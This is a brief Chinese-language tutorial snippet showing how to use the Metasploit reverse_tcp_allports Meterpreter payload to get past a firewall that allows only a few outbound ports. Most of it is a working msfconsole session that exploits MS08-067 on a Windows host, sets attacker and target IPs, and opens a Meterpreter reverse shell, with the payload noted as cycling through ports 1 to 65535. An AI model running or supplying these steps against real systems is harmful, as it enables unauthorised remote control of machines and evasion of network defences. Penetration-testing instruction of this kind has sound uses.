windows/meterpreter/reverse_tcp_allports
適用場景:目標(biāo)主機(jī)的防火墻僅放行個別特定的端口捧杉,我們很難判定通過哪些端口能夠連接到目標(biāo)主機(jī)耻卡。
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp_allports
msf exploit(ms08_067_netapi) > set lhost 192.168.80.163
msf exploit(ms08_067_netapi) > set rhost 192.168.80.44
msf exploit(ms08_067_netapi) > exploit
[*] Meterpreter session 4 opened (192.168.80.163:1 -> 192.168.80.44:1038) at 2017-05-02 21:03:05 +0800
這個攻擊載荷會對所有可用的端口進(jìn)行嘗試谬哀,遍歷1-65535端口號。